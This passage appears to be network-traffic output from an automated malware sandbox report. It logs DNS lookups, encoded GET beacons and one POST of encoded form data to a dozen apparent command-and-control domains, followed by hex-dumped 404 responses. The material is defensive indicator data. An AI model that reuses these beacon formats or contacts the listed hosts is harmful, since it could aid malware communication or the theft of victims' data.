Source: global traffic	HTTP traffic detected: GET /expp/?Z6ZTG=4RP2jfjc/CKkP2k0VFIzhmOcoxlGKDo9u/ZkfjmOk/GcJdogV5u478VHpy4Tx1zZR2PffU9j3QXLxJ/zQp1CY/gImr6l8nbjZW8kbJ4UJqZmHhNvkenHenANmOUPEa0Yb7H7CBE=&3pSl=bXiTJHhxyN HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.hondamechanic.todayConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Source: global traffic	HTTP traffic detected: GET /hfkt/?3pSl=bXiTJHhxyN&Z6ZTG=DjhV5ZtyptNtrRVL14+Y+susbmSjzG/9xdAoGM+9umLmUU6H5kdIuyQunB9svsxFbN7a2+mg2UjjMTinRCLCxuYh/RfhiZ2azIWHVHb3pa+ivSdntBEUsH8W9S2MHlPSw0GyODA= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.primefindsstore.shopConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Source: global traffic	HTTP traffic detected: GET /lxk5/?3pSl=bXiTJHhxyN&Z6ZTG=zj5keJbhqHRqpBHEzEPKOuQbxRjm8qWuWsd9F2eyqHWyZ50o0GVe7MC2nYinXopw20BlJsxmZQL4Qtg6IXTgBkLaiZkxb6ZcnHHrEYQse9ZTnJ7WfQRHJgpeqyDS6bOga2ykoHk= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.salecost.co.ukConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Source: global traffic	HTTP traffic detected: GET /odz6/?Z6ZTG=g2MxG/W7xhmOYso67RKSNHAiz8R/MmCgHQBJyh6P0RXX/Tr+d5ouA/hJc9ntyVwHyC0jENaFifi0j0/YggYyTtohP/rQs3Pv13bgnK1VWNIV+aS38IFIZFluiy4+zt0Ak7+zX+w=&3pSl=bXiTJHhxyN HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.bayviewcribbage.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0

Source: global traffic	DNS traffic detected: DNS query: www.le-kuk.shop
Source: global traffic	DNS traffic detected: DNS query: www.limpiezasbarcelo.com
Source: global traffic	DNS traffic detected: DNS query: www.top65s.com
Source: global traffic	DNS traffic detected: DNS query: www.videos60.com
Source: global traffic	DNS traffic detected: DNS query: www.vertilehub.xyz
Source: global traffic	DNS traffic detected: DNS query: www.theestrellastore.com
Source: global traffic	DNS traffic detected: DNS query: www.xuzfceth.com
Source: global traffic	DNS traffic detected: DNS query: www.hondamechanic.today
Source: global traffic	DNS traffic detected: DNS query: www.primefindsstore.shop
Source: global traffic	DNS traffic detected: DNS query: www.ecurtiscustoms.com
Source: global traffic	DNS traffic detected: DNS query: www.salecost.co.uk
Source: global traffic	DNS traffic detected: DNS query: www.bayviewcribbage.com

Source: unknown

HTTP traffic detected: POST /utkc/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflateHost: www.limpiezasbarcelo.comOrigin: http://www.limpiezasbarcelo.comConnection: closeContent-Type: application/x-www-form-urlencodedCache-Control: no-cacheContent-Length: 210Referer: http://www.limpiezasbarcelo.com/utkc/User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0Data Raw: 5a 36 5a 54 47 3d 38 57 4b 53 5a 66 58 64 70 41 63 35 36 73 4f 77 7a 64 36 39 30 46 35 65 7a 51 72 70 31 77 34 4d 74 6b 4b 74 49 5a 61 79 6e 73 62 30 67 56 67 6c 74 38 64 69 2b 57 69 73 4c 4a 2b 78 6b 43 72 4a 55 32 4a 6b 38 4d 58 4b 48 53 6e 46 69 6e 4a 35 42 57 6e 4d 42 56 42 77 46 34 41 4a 2b 5a 33 34 4a 67 31 68 72 6f 49 51 59 32 37 4d 62 41 33 32 57 64 6c 62 4f 77 59 5a 56 73 50 4c 4d 52 6e 4d 30 33 6f 6f 55 4b 79 54 46 4b 64 43 4d 72 74 49 67 33 65 2f 31 35 50 51 68 79 4b 47 38 44 47 71 54 56 66 2b 2b 7a 64 50 32 4d 6e 76 4a 36 6e 6a 48 62 74 6a 43 79 58 6b 74 35 78 33 43 72 31 6f 4b 48 69 51 45 62 73 32 6b 66 6d 77 Data Ascii: Z6ZTG=8WKSZfXdpAc56sOwzd690F5ezQrp1w4MtkKtIZaynsb0gVglt8di+WisLJ+xkCrJU2Jk8MXKHSnFinJ5BWnMBVBwF4AJ+Z34Jg1hroIQY27MbA32WdlbOwYZVsPLMRnM03ooUKyTFKdCMrtIg3e/15PQhyKG8DGqTVf++zdP2MnvJ6njHbtjCyXkt5x3Cr1oKHiQEbs2kfmw

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 16:52:47 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 75 74 6b 63 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /utkc/ was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 16:52:49 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 75 74 6b 63 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /utkc/ was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 16:52:52 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 75 74 6b 63 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /utkc/ was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 16:52:55 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 75 74 6b 63 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /utkc/ was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 16:53:14 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 68 66 6d 6d 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /hfmm/ was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 16:53:17 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 68 66 6d 6d 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /hfmm/ was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 16:53:19 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 68 66 6d 6d 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /hfmm/ was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 16:53:22 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 68 66 6d 6d 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /hfmm/ was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 16:53:28 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 16:53:30 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 16:53:33 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 16:53:35 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 03 Jul 2024 16:54:17 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingX-Powered-By: PHP/7.4.33Set-Cookie: slv_session_a09c0148b9fdb1e1201753b66346053d=533f06efaad74dc03aa6e60a6ce0ee3f%7C%7C1720198457%7C%7C1720194857%7C%7Ce58761108355481112a576e70ea7b708; expires=Fri, 02-Aug-2024 16:54:17 GMT; Max-Age=2592000; path=/Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidateSet-Cookie: PHPSESSID=72q7vrf1ctov17qs3optb9pvr5; path=/Pragma: no-cacheLink: <https://primefindsstore.shop/wp-json/>; rel="https://api.w.org/"Content-Encoding: gzipData Raw: 33 31 35 36 0d 0a 1f 8b 08 00 00 00 00 00 02 03 ed 7d f9 76 db 38 d2 ef df d3 e7 7c ef 80 51 cf 37 b6 7b 4c 49 d4 2e 27 76 8f 77 a7 bd c4 6d c9 c9 24 93 39 3a 10 09 49 8c 29 92 c3 c5 b6 92 93 07 ba af 71 9f ec 56 01 a4 04 48 24 25 6f dd 99 3b 9d c5 96 b0 fc 50 28 14 0a 85 02 58 7c fd 67 d3 35 c2 89 c7 c8 28 1c db 3b ff f3 c3 6b fc 4d 6c ea 0c b7 0b cc d1 ae 3b 05 62 d8 34 08 b6 0b 8e ab 7d 0e 0a e4 7e 6c 3b f0 6d 14 86 de 56 a9 74 77 77 57 bc ab 16 5d 7f 58 d2 db ed 76 09 6b 17 38 0c a3 26 fc 26 f0 e7 b5 6d 39 37 c4 67 f6 76 21 18 b9 7e 68 44 21 b1 0c d7 29 90 91 cf 06 02 2a 00 2c cf b7 c6 6c 60 39 66 10 84 ae cf 8a 50 d8 2b dd 79 1a 14 0d 99 13 96 22 cf 76 a9 19 94 2a e5 4a ad 54 6e 96 fa 2c 08 b5 80 d9 36 f3 03 ad 52 d6 06 f4 b6 e8 39 c3 42 29 69 77 cc 42 4a 8c 11 f5 03 16 6e 17 ae bb 47 5a ab a0 e4 39 74 cc b6 0b b7 16 bb f3 80 2e e8 a9 68 69 bb 70 67 99 e1 68 db 64 b7 96 c1 34 fe 65 93 58 8e 15 5a d4 d6 02 83 da 6c 5b 2f 96 37 c7 90 34 8e c6 52 0a 19 d3 fb f9 a4 28 60 3e ff 4e fb 90 e4 b8 9b 24 18 f9 c0 11 2d 74 b5 81 15 42 0a 12 15 93 15 5a a1 cd 76 08 b9 a4 43 46 1c 37 24 03 37 72 cc d7 25 91 2e 51 bd e6 bb 7d 37 0c d6 a6 34 af 41 d3 9a 35 86 7a 9a e7 33 ec d3 96 4d fd 21 5b 23 a5 9d 1f 66 43 b0 66 3a 01 16 18 b0 d0 18 ad 89 11 58 13 e3 38 74 dd a1 cd 8a 86 3b 5e ad 4e da 78 cd d7 0c c2 89 cd 82 11 63 e1 1a b1 cc ed b5 5b c7 a8 f4 a8 6d f3 74 cd 08 82 04 2e 96 a7 65 32 10 8e d8 98 05 25 3f ea 33 27 28 81 5c b2 30 28 01 4c 29 c1 2c c2 97 9f 6f 99 8f bc 2f 96 d7 08 ca f6 f6 5a c8 ee c3 12 6f 6d cc 4c 8b 6e af 41 f1 65 a4 82 a8 85 e3 27 93 f8 cc 44 41 3b 7d db 35 6e Data Ascii: 